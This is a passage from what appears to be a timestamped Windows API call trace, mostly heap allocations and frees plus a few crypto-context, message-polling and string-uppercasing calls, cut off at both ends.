hHeap=0x25c0000) returned 1 [0253.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0253.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0253.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0253.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0253.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0253.942] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad31c0) returned 1 [0253.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0253.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0253.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0253.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0253.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0253.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0253.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0253.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0253.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0253.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0253.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0253.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0253.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0253.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0253.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0253.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0253.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0253.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0253.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0253.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0253.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0253.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0253.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0253.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0253.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0253.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0253.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0253.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0253.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0253.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0253.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0253.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0253.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0253.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0253.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0253.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0253.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0253.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0253.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0253.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0253.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0253.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0253.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0253.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0253.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0253.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0253.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0253.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0253.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0253.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0253.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0253.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0253.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0253.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0253.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0253.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0253.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0253.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0253.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0253.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0253.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0253.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0253.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0253.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0253.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0253.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0253.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0253.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0253.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0253.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0253.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0253.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0253.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0253.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0253.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0253.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0253.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0253.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0253.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0253.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0253.949] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0253.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0253.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0253.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0253.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0253.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0253.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0253.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0253.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0253.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0253.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0253.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0253.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0253.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0253.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0253.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0253.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0253.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0253.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0253.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0253.950] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0253.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0253.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0253.950] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0253.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0253.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0253.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0253.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b18f8 [0253.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0253.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0253.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0253.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0253.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0253.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0253.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0253.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0253.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0253.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0253.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0253.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0253.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0253.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0253.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa610 [0253.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0253.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0253.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0253.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0253.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0253.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0253.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0253.952] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0253.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0253.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0253.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0253.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0253.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0253.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0253.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0253.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0253.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0253.953] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0253.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0253.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0253.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0253.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0253.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0253.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0253.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0253.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0253.954] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0253.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0253.954] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0253.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0253.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0253.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0253.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0253.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0253.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0253.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0253.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0253.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0253.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0253.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0253.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0253.955] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0253.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0253.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0253.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0253.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0253.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0253.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0253.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0253.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0253.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0253.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0253.956] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0253.956] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0253.956] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0253.956] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0253.956] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0253.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0253.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0253.956] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0253.956] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0253.956] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0253.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaaf0 [0253.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0253.956] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0253.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0253.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0253.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0253.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0253.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0253.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0253.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0253.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0253.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0253.957] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0253.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0253.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0253.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0253.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0253.958] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0253.958] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0253.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0253.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0253.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0253.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0253.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0253.958] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0253.958] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0253.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0253.958] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0253.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0253.958] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0253.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0253.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0253.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0253.959] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0253.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0253.959] RtlAllocateHeap 